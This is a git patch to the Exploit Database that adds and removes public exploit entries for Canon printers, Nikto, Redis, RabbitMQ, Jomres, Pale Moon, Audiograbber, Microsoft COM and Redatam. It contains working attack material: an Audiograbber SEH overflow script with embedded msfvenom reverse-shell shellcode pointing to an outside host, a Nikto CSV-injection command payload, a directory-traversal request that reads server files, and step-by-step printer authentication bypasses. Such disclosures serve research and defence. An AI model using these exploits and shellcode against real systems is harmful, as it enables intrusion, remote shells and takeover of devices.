From 086cfb2c761020d76385673216acdb3c2dae8efe Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 19 Jun 2018 05:01:47 +0000 Subject: [PATCH] DB: 2018-06-19 16 changes to exploits/shellcodes Nikto 2.1.6 - CSV Injection Pale Moon Browser < 27.9.3 - Use After Free (PoC) Audiograbber 1.83 - Local Buffer Overflow (SEH) Redis-cli < 5.0 - Buffer Overflow (PoC) Microsoft COM for Windows - Privilege Escalation Canon LBP6650/LBP3370/LBP3460/LBP7750C - Authenticaton Bypass Canon MF210/MF220 - Authenticaton Bypass Canon LBP7110Cw - Authentication Bypass Canon LBP6030w - Authentication Bypass Joomla! Component jomres 9.11.2 - Cross-Site Request Forgery RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery Redatam Web Server < 7 - Directory Traversal --- exploits/hardware/webapps/44844.txt | 184 ---------------- exploits/hardware/webapps/44845.txt | 323 ---------------------------- exploits/hardware/webapps/44885.txt | 39 ---- exploits/hardware/webapps/44886.txt | 38 ---- exploits/linux/local/44899.txt | 52 +++++ exploits/linux/local/44904.py | 21 ++ exploits/linux/webapps/44902.txt | 24 +++ exploits/php/webapps/44901.html | 37 ++++ exploits/windows/local/44900.txt | 37 ++++ exploits/windows/local/44903.py | 110 ++++++++++ exploits/windows/local/44906.txt | 11 + exploits/windows/webapps/44905.txt | 90 ++++++++ files_exploits.csv | 12 +- 13 files changed, 390 insertions(+), 588 deletions(-) delete mode 100644 exploits/hardware/webapps/44844.txt delete mode 100644 exploits/hardware/webapps/44845.txt delete mode 100644 exploits/hardware/webapps/44885.txt delete mode 100644 exploits/hardware/webapps/44886.txt create mode 100644 exploits/linux/local/44899.txt create mode 100755 exploits/linux/local/44904.py create mode 100644 exploits/linux/webapps/44902.txt create mode 100644 exploits/php/webapps/44901.html create mode 100644 exploits/windows/local/44900.txt create mode 100755 exploits/windows/local/44903.py create mode 100644 exploits/windows/local/44906.txt create mode 100644 exploits/windows/webapps/44905.txt diff --git a/exploits/hardware/webapps/44844.txt b/exploits/hardware/webapps/44844.txt deleted file mode 100644 index 323724488..000000000 --- a/exploits/hardware/webapps/44844.txt +++ /dev/null @@ -1,184 +0,0 @@ -# Exploit Title: [ Incorrect Access Control in Canon LBP6650, LBP3370, LBP3460, LBP7750C] -# Date: [3.6.2018] -# Exploit Author: [Huy Kha] -# Vendor Homepage: [http://global.canon.com] -# Software Link: [ Website ] -# Severity: High -# Version: LBP6650, LBP3370, LBP3460, LBP7750C -# Tested on: Mozilla FireFox - -# Description : An issue was discovered on Canon LBP6650, LBP3370, LBP3460, LBP7750C printers. -It is possible for a remote (unauthenticated) attacker to bypass the Administrator Mode authentication without a password at any URL of the device that requires authentication. - - - -# PoC : -Start searching for Canon LBP6650 ,LBP3370, LBP3460 printers. -You can recognize them with the /tlogin.cgi parameter, but the version is -also been displayed on the webinterface. -https://imgur.com/a/QE3GfLw - -# Example : - -1. Go to the following url: http://127.0.0.1/tlogin.cgi -2. Click on Administrator Mode -3. Intercept now the request with Burpsuite and click on 'Ok'' to login. -And forward the request till you get the ''/frame.cgi?page=DevStatus'' -parameter. - - -# Request : - -GET /frame.cgi?page=DevStatus HTTP/1.1 -Host: 127.0.0.1 -User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 -Firefox/52.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: en-US,en;q=0.5 -Accept-Encoding: gzip, deflate -Referer: http://127.0.0.1/tlogin.cgi -Cookie: CookieID=1610705327:; Login=11 -Connection: close -Upgrade-Insecure-Requests: 1 - -# Response : - -HTTP/1.1 200 OK -Date: MON, 05 JAN 1970 16:35:57 GMT -Server: CANON HTTP Server -Content-Type: text/html -Content-Length: 5652 - - - - - - - - - - - - - - - - - - - - -<body> -</body> - - - - - - -# Do we have now access to the printer with Admin Mode? : Yes - -# How to fix this? : Remove the default password and add a new (strong) password. - - -# Screenshot : https://imgur.com/a/ISDL1Qf (Administrator Mode) \ No newline at end of file diff --git a/exploits/hardware/webapps/44845.txt b/exploits/hardware/webapps/44845.txt deleted file mode 100644 index 8876ca087..000000000 --- a/exploits/hardware/webapps/44845.txt +++ /dev/null @@ -1,323 +0,0 @@ -# Exploit Title: [ Incorrect Access Control in Canon MF210 & MF220 Series ] -# Date: [4.6.2018] -# Exploit Author: [Huy Kha] -# Vendor Homepage: [http://global.canon.com] -# Software Link: [ Website ] -# Version: MF210 & MF20 Series -# Severity: High -# Tested on: Mozilla FireFox -# Description : An issue was discovered on Canon MF210 & MF220 printers webinterface. -It is possible for a remote (unauthenticated) attacker to bypass the System Manager Mode authentication without a PIN at any URL of the device that requires authentication. - - - -# PoC : -Start searching for Canon MF210 & MF220 printers. -You can recognize them with the /login.html parameter, but the version is -also been displayed on the webinterface. -https://imgur.com/a/5ON4HF6 - -# Example : - -1. Go to the following url: http://127.0.0.1/login.html -2. Click on System Manager Mode -3. Intercept now the request with Burpsuite and click then on 'Ok'' to login. And forward the request till you get the ''/portal_top.html'' parameter. - - -# Request : - -GET /portal_top.html HTTP/1.1 -Host: 127.0.0.1 -User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 -Firefox/52.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: en-US,en;q=0.5 -Accept-Encoding: gzip, deflate -Referer: http://129.2.52.116/login.html -Cookie: fusion-http-session-id=TYFMNOVENYXIJSRENKDC -Connection: close -Upgrade-Insecure-Requests: 1 - -# Response : - -HTTP/1.1 200 OK -Expires: Thu, 1 Jan 1998 00:00:00 GMT -Content-Type: text/html -Content-Length: 6119 -Pragma: no-cache -Cache-Control: no-store, no-cache, max-age=0 -Connection: close -Set-Cookie: -fusion-http-session-id=TYFMNOVENYXIJSRENKDC;Comment=;Version=;HttpOnly - - - - - - - - - - - - - - - - - - -Remote UI: Portal: MF220 Series: MF220 Series - - -

-

-

-

-

- - - - - -

-

- - ---- - - - - - - - - - - - - - - -


Device Name:	MF220 Series
Product Name:	MF220 Series
Location:

-

-

-

-

- -

-

-

-

-

-

-

-

-

-

Remote UI: Portal

-

-Mail to System Manager -

-

-

-

-

-

-

-

-

-

Device Info

-

-

Last Updated:06/04/2018 04:27 AM

-

-

-

-

-

-

-

Contents

-

-

-

-

-

Device Basic Information

-

-

Device Status

- ---- - - - - - - - - - - - - - - - - -

Printer:	-Sleep mode. -
Scanner:	-Sleep mode. -
Fax:	-Ready to send or receive faxes. -

-

-

-

Error Information

-

No errors.

- -

-

-

-

Consumables Information

-

- -

Paper Information

- ------ - - - - - - - - - - - - - - - - - - - - - - - - - - -

Paper Source	Paper Level	Paper Size	Paper Type
Multi-Purpose Tray	None	LTR	Plain (16 lb Bond-23 lb Bond)
Drawer 1	OK	LTR	Plain (16 lb Bond-23 lb Bond)

-

-

-

Cartridge Information

- ---- - - - - - - - - - - - - -

Color	Level
Black	60%

-

-

-

-

Support Link

-

- ---- - - - - - - - - -

Support Link:

-

-

-

-

-

-

-

-

- -

-

-

-

-

-

-

Copyright CANON INC. 2014

-

-

- - - - - - -# Do we have now access to the printer with System Manager Mode? : Yes - -# Screenshot : https://imgur.com/a/U6oBYNV - -# How to fix this? : Remove the default password and add a new (strong) password. \ No newline at end of file diff --git a/exploits/hardware/webapps/44885.txt b/exploits/hardware/webapps/44885.txt deleted file mode 100644 index b55be406c..000000000 --- a/exploits/hardware/webapps/44885.txt +++ /dev/null @@ -1,39 +0,0 @@ -# Exploit Title: Canon LBP7110Cw - Authentication Bypass -# Date: 2018-06-07 -# Exploit Author: Huy Kha -# Vendor Homepage: http://global.canon.com -# Version: LBP7110Cw -# CVE: CVE-2018-12049 -# Severity: High (Leads to full System Manager Mode account take-over) - -# Description : A remote attacker can bypass the Management Mode on the -# Canon LBP7110Cw web interface without a PIN for /checkLogin.cgi via -# vectors involving /portal_top.html to get full access to the device. - -# PoC : -# As you can see when we're type a random password. -# You'll get an error for an incorrect authentication. -# Now with a simple request, we can bypass the authentication -# and get full access to the printer with ''Management Mode'' - -1. Go to the following url: http://TargetURL/ -2. Click on Management Mode -3. Intercept now the request with Burpsuite and click then on 'Ok'' to -login. And now you have to forward POST /checkLogin.cgi HTTP/1.1 request -to the GET /portal_top.html HTTP/1.1 - -# Request : -GET /portal_top.html HTTP/1.1 -Host: 127.0.0.1 -User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 -Firefox/52.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: en-US,en;q=0.5 -Accept-Encoding: gzip, deflate -Referer: http://164.125.112.38/ -Cookie: sessid=QegLH5ETb92HEEPWr55AiA## -Connection: close -Upgrade-Insecure-Requests: 1 - -# Do we have now access to the printer with Management Mode? : Yes -# Impact: A remote attacker can have take-over the whole printer \ No newline at end of file diff --git a/exploits/hardware/webapps/44886.txt b/exploits/hardware/webapps/44886.txt deleted file mode 100644 index 45cc57b01..000000000 --- a/exploits/hardware/webapps/44886.txt +++ /dev/null @@ -1,38 +0,0 @@ -# Exploit Title: Canon LBP6030w - Authentication Bypass -# Date: 2018-06-07 -# Exploit Author: Huy Kha -# Vendor Homepage: http://global.canon.com -# Version: LBP6030w -# Severity: High (Leads to full System Manager Mode account take-over) -# CVE: CVE-2018-12049 - -# Description : A remote attacker can bypass the System Manager Mode on the -# Canon LBP6030w web interface without a PIN for /checkLogin.cgi via vectors -# involving /portal_top.html to get full access to the device. - -# PoC : -# Now with a simple request, we can bypass the authentication and get full -# access to the printer with ''System Manager Mode'' - -1. Go to the following url: http://TargetURL/ -2. Click on System Manager Mode -3. Intercept now the request with Burpsuite and click then on 'Ok'' to -login. And now you have to forward POST /checkLogin.cgi HTTP/1.1 request to -the GET /portal_top.html HTTP/1.1 - -# Request : -GET /portal_top.html HTTP/1.1 -Host: 127.0.0.1 -User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 -Firefox/52.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: en-US,en;q=0.5 -Accept-Encoding: gzip, deflate -Referer: http://23.125.171.217/ -Cookie: sessid=TOIJNROiOcNQQaGdHeQ3PQ## -Connection: close -Upgrade-Insecure-Requests: 1 - -# Do we have now access to the printer with System Manager? : Yes -# Impact: A remote attacker can have take-over the whole printer if there -# is no PIN set by a user. \ No newline at end of file diff --git a/exploits/linux/local/44899.txt b/exploits/linux/local/44899.txt new file mode 100644 index 000000000..b1f0395c9 --- /dev/null +++ b/exploits/linux/local/44899.txt @@ -0,0 +1,52 @@ +# Exploit Title: Nikto 2.1.6 - CSV Injection +# Google Dork: N/A +# Date: 2018-06-01 +# Exploit Author: Adam Greenhill +# Vendor Homepage: https://cirt.net/Nikto2 +# Software Link: https://github.com/sullo/nikto +# Affected Version: 2.1.6, 2.1.5 +# Category: Applications +# Tested on: Kali Linux 4.14 x64 +# CVE : CVE-2018-11652 + +# Technical Description: +# CSV Injection vulnerability in Nikto 2.1.6 and earlier allows remote attackers +# to inject arbitrary OS commands via the Server field in an HTTP response header, +# which is directly injected into a CSV report. + +# PoC +# Install nginx and nginx-extras: apt-get install -y nginx nginx-extras +# Configure the nginx server as follows by editing the /etc/nginx/nginx.conf file: + +user www-data; +worker_processes auto; +pid /run/nginx.pid; +include /etc/nginx/modules-enabled/*.conf; + +events { + worker_connections 768; + # multi_accept on; +} + +http { + server_tokens off; # removed pound sign + more_set_headers "Server: =cmd|' /C calc'!'A1'"; + + server { + listen 80; + + server_name localhost; + + location /hello { + return 200 "hello world"; + } + } +} + +# Restart the server: service nginx restart +# Scan the nginx server with Nikto configured to output the results to a CSV file: + +nikto -h :80 -o vuln.csv + +# Open the resulting CSV file in Microsoft Excel and observe that CMD is attempting +# to execute \ No newline at end of file diff --git a/exploits/linux/local/44904.py b/exploits/linux/local/44904.py new file mode 100755 index 000000000..188704170 --- /dev/null +++ b/exploits/linux/local/44904.py @@ -0,0 +1,21 @@ +# Exploit Title: Redis-cli < 5.0 - Buffer Overflow (PoC) +# Date: 2018-06-13 +# Exploit Author: Fakhri Zulkifli +# Vendor Homepage: https://redis.io/ +# Software Link: https://redis.io/download +# Version: 5.0, 4.0, 3.2 +# Fixed on: 5.0, 4.0, 3.2 +# CVE : CVE-2018-12326 + +# Buffer overflow in redis-cli of Redis version 3.2, 4.0, and 5.0 allows a local attacker +# to achieve code execution and escalate to higher privileges via a long string in the hostname parameter. + +$ ./src/redis-cli -h `python -c 'print "A" * 300'` +Could not connect to Redis at AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:6379: Name or service not known + +#0 0x4a4182 in vsnprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1566 +#1 0x4a42d0 in snprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1637 +#2 0x570159 in repl /home/user/redis/src/redis-cli.c:1624:5 +#3 0x55ba77 in main /home/user/redis/src/redis-cli.c:6660:9 +#4 0x7f6be5f6e82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291 +#5 0x4247a8 in _start (/home/user/redis/src/redis-cli+0x4247a8) \ No newline at end of file diff --git a/exploits/linux/webapps/44902.txt b/exploits/linux/webapps/44902.txt new file mode 100644 index 000000000..32331887f --- /dev/null +++ b/exploits/linux/webapps/44902.txt @@ -0,0 +1,24 @@ +# Exploit Title: RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery +# Date: 2018-06-17 +# Author: Dolev Farhi +# Vendor or Software Link: www.rabbitmq.com +# Version: 3.7.6 +# Tested on: Ubuntu + + +

Add RabbitMQ Admin

+ + + + + + + + \ No newline at end of file diff --git a/exploits/php/webapps/44901.html b/exploits/php/webapps/44901.html new file mode 100644 index 000000000..f84a9303b --- /dev/null +++ b/exploits/php/webapps/44901.html @@ -0,0 +1,37 @@ +# Exploit Title: Joomla!Component jomres 9.11.2 - Cross site request forgery +# Date: 2018-06-15 +# Exploit Author: L0RD +# Vendor Homepage: https://www.jomres.net/ +# Software link: https://extensions.joomla.org/extension/jomres/ +# Software Download: https://github.com/WoollyinWalesIT/jomres/releases/download/9.11.2/jomres.zip +# Version: 9.11.2 +# Tested on: Kali linux +=================================================== +# POC : + + + + CSRF POC + + + + + + + +=================================================== \ No newline at end of file diff --git a/exploits/windows/local/44900.txt b/exploits/windows/local/44900.txt new file mode 100644 index 000000000..faf6640a0 --- /dev/null +++ b/exploits/windows/local/44900.txt @@ -0,0 +1,37 @@ +# Exploit Title: Pale Moon Browser < 27.9.3 - Use After Free (PoC) +# Date: 2018-06-13 +# Author - Berk Cem Goksel +# Vendor Homepage: https://www.palemoon.org/ +# Software Link: https://www.palemoon.org/palemoon-win32.shtml +# Version: Versions prior to 27.9.3 (Tested versions: 27.9.0, 27.9.1, 27.9.2) +# Tested on: Windows 10 +# Category: Windows Remote Exploit +# CVE : CVE-2018-12292 + + + + + + + + + + + + + \ No newline at end of file diff --git a/exploits/windows/local/44903.py b/exploits/windows/local/44903.py new file mode 100755 index 000000000..1d1705d12 --- /dev/null +++ b/exploits/windows/local/44903.py @@ -0,0 +1,110 @@ +# Exploit Title: Audiograbber 1.83 - Local Buffer Overflow (SEH) +# Date: 2018-06-16 +# Exploit Author: Dennis 'dhn' Herrmann +# Vendor Homepage: https://www.audiograbber.org/ +# Version: 1.83 +# Tested on: Windows 7 SP1 (x86) + +#!/usr/bin/env python +# $Id: exploit.py,v 1.0 2018/06/16 13:25:59 dhn Exp $ +# +# Tested with Windows 7 SP1 (x86) +# Steps: +# - Paste "poc.txt" content in the "Interpret" or "Album" field + +class Exploit: + + def __init__(self, shellcode): + self._shellcode = shellcode + self._payload = None + + def __write(self): + f = open("poc.txt", "w") + f.write(self._payload) + f.close() + + def run(self): + pattern = "A" * 256 + jmp_short = "\xeb\x08\x90\x90" # short JMP + pop2ret = "\x79\x91\x01\x10" # WMA8Connect.dll + + self._payload = pattern + self._payload += jmp_short + self._payload += pop2ret + + # The buffer is mangled so we have to jump + # over the parts to reached our shellcode + self._payload += "\x90" * 18 + jmp_short + self._payload += "\x90" * 28 + jmp_short + self._payload += "\x90" * 32 + self._shellcode + + self.__write() + +def main(): + # msfvenom --platform windows -p windows/shell_reverse_tcp \ + # LHOST=10.168.142.129 LPORT=443 -b "\x00\x0a\x0d" \ + # -e x86/alpha_mixed -f py + shellcode = ( + "\xda\xcd\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49" + "\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51" + "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51" + "\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50" + "\x38\x41\x42\x75\x4a\x49\x39\x6c\x59\x78\x6f\x72\x77" + "\x70\x73\x30\x73\x30\x43\x50\x4e\x69\x6b\x55\x55\x61" + "\x69\x50\x32\x44\x6c\x4b\x76\x30\x70\x30\x6e\x6b\x50" + "\x52\x54\x4c\x4c\x4b\x72\x72\x47\x64\x6c\x4b\x74\x32" + "\x46\x48\x36\x6f\x6d\x67\x73\x7a\x67\x56\x74\x71\x6b" + "\x4f\x4e\x4c\x37\x4c\x51\x71\x53\x4c\x53\x32\x34\x6c" + "\x75\x70\x59\x51\x78\x4f\x56\x6d\x73\x31\x79\x57\x6b" + "\x52\x4b\x42\x71\x42\x56\x37\x4c\x4b\x63\x62\x74\x50" + "\x6e\x6b\x52\x6a\x57\x4c\x4c\x4b\x42\x6c\x54\x51\x32" + "\x58\x4d\x33\x37\x38\x57\x71\x58\x51\x76\x31\x4e\x6b" + "\x33\x69\x31\x30\x37\x71\x4e\x33\x6e\x6b\x61\x59\x47" + "\x68\x4a\x43\x47\x4a\x43\x79\x4e\x6b\x76\x54\x6e\x6b" + "\x37\x71\x38\x56\x74\x71\x59\x6f\x4c\x6c\x4b\x71\x78" + "\x4f\x36\x6d\x36\x61\x68\x47\x75\x68\x6b\x50\x70\x75" + "\x39\x66\x55\x53\x31\x6d\x4c\x38\x35\x6b\x73\x4d\x71" + "\x34\x62\x55\x4a\x44\x73\x68\x4c\x4b\x31\x48\x61\x34" + "\x76\x61\x58\x53\x30\x66\x6e\x6b\x76\x6c\x50\x4b\x4e" + "\x6b\x31\x48\x35\x4c\x67\x71\x59\x43\x4c\x4b\x37\x74" + "\x4c\x4b\x53\x31\x4e\x30\x4b\x39\x33\x74\x55\x74\x45" + "\x74\x73\x6b\x43\x6b\x31\x71\x31\x49\x53\x6a\x43\x61" + "\x4b\x4f\x79\x70\x63\x6f\x73\x6f\x70\x5a\x4c\x4b\x64" + "\x52\x5a\x4b\x6c\x4d\x43\x6d\x52\x48\x30\x33\x67\x42" + "\x37\x70\x73\x30\x35\x38\x34\x37\x53\x43\x76\x52\x33" + "\x6f\x53\x64\x63\x58\x30\x4c\x33\x47\x76\x46\x44\x47" + "\x6b\x4f\x38\x55\x6d\x68\x4a\x30\x37\x71\x47\x70\x47" + "\x70\x55\x79\x69\x54\x76\x34\x46\x30\x35\x38\x45\x79" + "\x6d\x50\x70\x6b\x57\x70\x79\x6f\x4a\x75\x56\x30\x56" + "\x30\x30\x50\x46\x30\x73\x70\x30\x50\x43\x70\x72\x70" + "\x62\x48\x4b\x5a\x44\x4f\x59\x4f\x6d\x30\x49\x6f\x7a" + "\x75\x7a\x37\x51\x7a\x55\x55\x53\x58\x76\x6a\x6e\x48" + "\x4c\x4e\x6e\x61\x73\x58\x44\x42\x67\x70\x47\x71\x4f" + "\x4b\x4d\x59\x4d\x36\x53\x5a\x34\x50\x70\x56\x76\x37" + "\x31\x78\x6e\x79\x49\x35\x44\x34\x53\x51\x49\x6f\x68" + "\x55\x6d\x55\x6f\x30\x50\x74\x36\x6c\x69\x6f\x50\x4e" + "\x56\x68\x52\x55\x6a\x4c\x73\x58\x6a\x50\x58\x35\x6c" + "\x62\x46\x36\x59\x6f\x48\x55\x32\x48\x43\x53\x30\x6d" + "\x63\x54\x77\x70\x6f\x79\x78\x63\x56\x37\x32\x77\x46" + "\x37\x50\x31\x59\x66\x32\x4a\x46\x72\x53\x69\x62\x76" + "\x79\x72\x59\x6d\x52\x46\x59\x57\x63\x74\x51\x34\x37" + "\x4c\x76\x61\x66\x61\x6c\x4d\x61\x54\x44\x64\x42\x30" + "\x6b\x76\x73\x30\x42\x64\x63\x64\x52\x70\x31\x46\x51" + "\x46\x50\x56\x42\x66\x30\x56\x62\x6e\x71\x46\x76\x36" + "\x36\x33\x71\x46\x42\x48\x74\x39\x7a\x6c\x55\x6f\x4f" + "\x76\x59\x6f\x6b\x65\x4b\x39\x59\x70\x70\x4e\x66\x36" + "\x30\x46\x59\x6f\x64\x70\x31\x78\x67\x78\x6c\x47\x67" + "\x6d\x35\x30\x49\x6f\x78\x55\x4d\x6b\x58\x70\x6d\x65" + "\x6f\x52\x36\x36\x73\x58\x6c\x66\x7a\x35\x4d\x6d\x6d" + "\x4d\x59\x6f\x59\x45\x75\x6c\x53\x36\x31\x6c\x47\x7a" + "\x6d\x50\x49\x6b\x79\x70\x70\x75\x36\x65\x6f\x4b\x77" + "\x37\x62\x33\x61\x62\x70\x6f\x71\x7a\x45\x50\x61\x43" + "\x6b\x4f\x69\x45\x41\x41" + ) + + exploit = Exploit(shellcode) + exploit.run() + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/windows/local/44906.txt b/exploits/windows/local/44906.txt new file mode 100644 index 000000000..d27a5de06 --- /dev/null +++ b/exploits/windows/local/44906.txt @@ -0,0 +1,11 @@ +Writeup: https://codewhitesec.blogspot.com/2018/06/cve-2018-0624.html + +In May 2018 Microsoft patched an interesting vulnerability (CVE-2018-0824) which was reported by Nicolas Joly of Microsoft's MSRC: + +A remote code execution vulnerability exists in "Microsoft COM for Windows" when it fails to properly handle serialized objects. An attacker who successfully exploited the vulnerability could use a specially crafted file or script to perform actions. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file that is designed to exploit the vulnerability. However, an attacker would have no way to force the user to visit the website. Instead, an attacker would have to convince the user to click a link, typically by way of an enticement in an email or Instant Messenger message, and then convince the user to open the specially crafted file. The security update addresses the vulnerability by correcting how "Microsoft COM for Windows" handles serialized objects. + +The keywords "COM" and "serialized" pretty much jumped into my face when the advisory came out. Since I had already spent several months of research time on Microsoft COM last year I decided to look into it. Although the vulnerability can result in remote code execution, I'm only interested in the privilege escalation aspects. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44906.zip \ No newline at end of file diff --git a/exploits/windows/webapps/44905.txt b/exploits/windows/webapps/44905.txt new file mode 100644 index 000000000..ccbf563f1 --- /dev/null +++ b/exploits/windows/webapps/44905.txt @@ -0,0 +1,90 @@ +# Exploit Title: Redatam Web Server < 7 - Directory Traversal +# Google Dork: inurl: /redbin/rpwebutilities.exe/ +# Date: 2018-06-18 +# Exploit Author: Berk Dusunur +# Vendor Homepage: http://redatam.org/redatam/en/index.html +# Software Link: https://www.cepal.org/en/topics/redatam/download-redatam +# Version: before V6 +# Tested on: Pardus Windows AppServ +# CVE : N/A + +# Proof of Concept +# Redatam web server windows server running LFN parameter affected by directory traversal +# Making a wrong request causes directory leak + +# Request + +GET /redbin/rpwebutilities.exe/text?LFN=blablabla%00.htm&TYPE=TMP HTTP/1.1 +Host: 192.168.1.104 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 +Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 + +# Response + +HTTP/1.1 500 Internal Server Error +Date: Mon, 18 Jun 2018 10:04:44 GMT +Server: Apache/2.4.23 (Win32) PHP/5.6.25 +Content: +Content-Length: 416 +Connection: close +Content-Type: text/html + + + + + +

R+SP WebUtilities Exception

+

Error Number [401]

+

Error Message

+

File not found in folder [C:\wamp\apps\redatam\redbin\] - [blablabla] + +Script directory /wamp/apps/redatam/redbin/ + +# Request 2 + +GET +/redbin/rpwebutilities.exe/text?LFN=../../../../../../../../../../../../../../../../wamp/apps/redatam/redbin/prt/webservermain.inl%00.htm&TYPE=TMP +HTTP/1.1 +Host: 192.168.1.104 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 +Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 + +# Response 2 + +HTTP/1.1 200 OK +Date: Mon, 18 Jun 2018 10:11:44 GMT +Server: Apache/2.4.23 (Win32) PHP/5.6.25 +Title: +../../../../../../../../../../../../../../../../wamp/apps/redatam/redbin/prt/webservermain.inl +Content: +Content-Length: 2319 +Connection: close +Content-Type: text/html; charset=utf-8 + +[STRUCTURE] +USERCONTROL=YES +GROUPALIGN=LEFT + +SERVERTIMEOUT=1800 + +HTMLPATH=RpSite\ + +PORTALTITLE=CELADE/CEPAL, Nações Unidas +PORTALSUBTITLE=Procesamiento En-Línea com REDATAM + +//PORTALCENTERIMAGE=/redatam/images/LogoRedatam7_520x390.png +//PORTALBACKGROUNDHEADERIMAGE= +//PORTALBACKGROUNDINDEXIMAGE= +//PORTALBACKGROUNDOUTPUTIMAGE= \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index dbf816cd4..9b8dc6510 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9775,6 +9775,7 @@ id,file,description,date,author,type,platform,port 44840,exploits/windows_x86/local/44840.py,"10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86, 44841,exploits/windows_x86/local/44841.py,"10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86, 44842,exploits/linux/local/44842.txt,"WebKitGTK+ < 2.21.3 - Crash (PoC)",2018-06-05,"Dhiraj Mishra",local,linux, +44899,exploits/linux/local/44899.txt,"Nikto 2.1.6 - CSV Injection",2018-06-18,"Adam Greenhill",local,linux, 41705,exploits/windows_x86/local/41705.cpp,"Fortinet FortiClient 5.2.3 (Windows 10 x86) - Local Privilege Escalation",2017-03-11,sickness,local,windows_x86, 44852,exploits/android/local/44852.txt,"Ftp Server 1.32 - Credential Disclosure",2018-06-07,ManhNho,local,android, 44858,exploits/windows/local/44858.txt,"TrendMicro OfficeScan XG 11.0 - Change Prevention Bypass",2018-06-08,hyp3rlinx,local,windows, @@ -9782,6 +9783,10 @@ id,file,description,date,author,type,platform,port 44889,exploits/linux/local/44889.rb,"glibc - 'realpath()' Privilege Escalation (Metasploit)",2018-06-13,Metasploit,local,linux, 44892,exploits/windows/local/44892.txt,"RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation",2018-06-13,LiquidWorm,local,windows, 44896,exploits/windows/local/44896.vb,"Soroush IM Desktop app 0.15 - Authentication Bypass",2018-06-15,VortexNeoX64,local,windows, +44900,exploits/windows/local/44900.txt,"Pale Moon Browser < 27.9.3 - Use After Free (PoC)",2018-06-18,"Berk Cem Göksel",local,windows, +44903,exploits/windows/local/44903.py,"Audiograbber 1.83 - Local Buffer Overflow (SEH)",2018-06-18,"Dennis 'dhn' Herrmann",local,windows, +44904,exploits/linux/local/44904.py,"Redis-cli < 5.0 - Buffer Overflow (PoC)",2018-06-18,"Fakhri Zulkifli",local,linux, +44906,exploits/windows/local/44906.txt,"Microsoft COM for Windows - Privilege Escalation",2018-06-18,"Code White",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -39527,8 +39532,6 @@ id,file,description,date,author,type,platform,port 44837,exploits/php/webapps/44837.py,"Pagekit < 1.0.13 - Cross-Site Scripting Code Generator",2018-06-05,DEEPIN2,webapps,php, 44839,exploits/hardware/webapps/44839.md,"Brother HL Series Printers 1.15 - Cross-Site Scripting",2018-06-04,"Huy Kha",webapps,hardware, 44843,exploits/linux/webapps/44843.py,"Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)",2018-06-05,Kl3_GMjq6,webapps,linux, -44844,exploits/hardware/webapps/44844.txt,"Canon LBP6650/LBP3370/LBP3460/LBP7750C - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware, 